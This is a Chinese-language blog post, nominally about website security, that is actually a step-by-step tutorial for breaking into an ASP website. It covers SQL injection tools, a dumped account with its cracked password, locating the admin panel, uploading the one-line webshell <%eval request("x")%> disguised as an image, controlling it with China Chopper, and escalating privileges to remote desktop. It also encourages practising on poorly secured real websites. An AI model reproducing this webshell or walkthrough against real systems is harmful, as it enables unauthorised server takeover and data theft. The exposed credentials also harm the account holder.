最新公告
  • 欢迎您光临源码库,本站秉承服务宗旨 履行“站长”责任,销售只是起点 服务永无止境!立即加入
  • 黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池

    我们都知道建设网站的初期要设置好域名空间、建站程序、主题内容。这些是建设一个好网站的基本要素,但是如何确保网站能够安全、良好的运营下去,这是每一个站长都需要考率的问题。建议各位站长在网站建设之初,就要将网站的安全问题考虑在内,否则一旦网站被黑,解决费时不说,导致网站被K也是很平常的事情。

    黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

           

    俗话说的好知己知彼,百战百胜,只有了解黑客常用黑站方法,我们才能够有针对的做好防御策略。

    下面的这些工具是黑客比较常用的工具

    1、找注入 爆账号啊D和明小子

    2、注入工具椰树扫描、流光、Pangolin(穿山甲)、havij(胡萝卜)

    3、找后台御剑后台扫描、wwwscan扫描器

    4、传小马各种一句话木马、中国菜刀、中国蚁剑5、提权pr提权工具、黑协提权工具

    接下来就直接渗透一个网站案例,下面来演示各种工具的使用方法:

    实验环境大家可以用虚拟机或者本地进行模拟操作,或者找些漏洞较多,比较垃圾的网站进行操作。

    演示开始:

    步骤一:找注入打开浏览器,推荐用火狐浏览器或谷歌浏览器。出现下图的页面,这里用ie演示。

    黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    IE浏览器的选项设置,新手建议全部显示反馈的错误信息,根据实际情况来,就可以准确的判断网页的信息。直接用啊D注入工具和明小子配合检测使用

    黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    成功找到注入点,如下图:

    黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    步骤二:爆账号右键找到的注入点——注入检测

    黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    点击右上角的检测开始注入检测

    黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    最后得到网站的某个账号,用户名:linhai ,密码:d7e15730ef9708c0一般来说,数据库存放的密码应该是经过md5加密过的,不用担心,只需要用解密MD5工具一下就可以解密,百度一下,解密工具很多,这里推荐:http://www.dmd5.com解密md5后得到的密码为:linhai19760812

    步骤三:找后台【可以用御剑后台扫描器扫描】此步骤为找到网站的管理后台。

    黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    接下来,访问扫描到的后台地址,登录。地址:/admin/login.asp

    黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    直接登录网站后台,到这里,已经成功获得网站后台管理权限了。

    步骤四:传小马记住黑客入门教程里面的一句话,先传小马,再传大马,找到上传点就不会错,稳拿下。由于是asp的站点,确定需要的是asp一句话木马,代码为<%eval request("x")%>,密码为x网站后台的上传点可能很多,有的可行,有的不行,可以多试试,我们的目的就是通过这些上传点,把我们的木马上传到网站服务器,从而控制网站。通常成功率比较高的上传点是上传图片附件,如下图:

    黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    做个木马,打开txt文档,写上asp一句话<%eval request("x")%>,密码是x。并且把文件类型改成图片,不要只写一行代码,不大不小,100行差不多。

    黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    然后上传。接下来的思路就是利用网站的数据库功能,把我们上传的文件后缀由jpg改成asp。

    黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    然后,就可以用菜刀,连接刚才复制到根目录的xbk.asp文件(木马)。打开菜刀,在空白处右键——添加,输入木马的地址和网站。

    黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    步骤五:拿权限接下来主要用提权三件套:cmd.exe、pr.exe、3389.bat ,把这3个工具,用菜刀上传到回收站目录下面。接下来,进入我们上传的cmd.exe虚拟终端,执行我们的提权三件套。

    黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    不仅仅这种方法可以成功,不同的思路可以转变,或许过程会很顺利,也或者防护很多,没办法顺利入侵成功。执行完成后,打开远程桌面,用刚才提权的账号,进入服务器。

    黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池插图源码资源库

    到此为止,一个完整的渗透过程结束,已经成功获得服务器的管理权限了。

    1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!
    2. 分享目的仅供大家学习和交流,您必须在下载后24小时内删除!
    3. 不得使用于非法商业用途,不得违反国家法律。否则后果自负!
    4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
    5. 如有链接无法下载、失效或广告,请联系管理员处理!
    6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!

    源码资源库 » 黑客如何进行网站入侵实战教程_蜘蛛技巧_超级蜘-蛛-池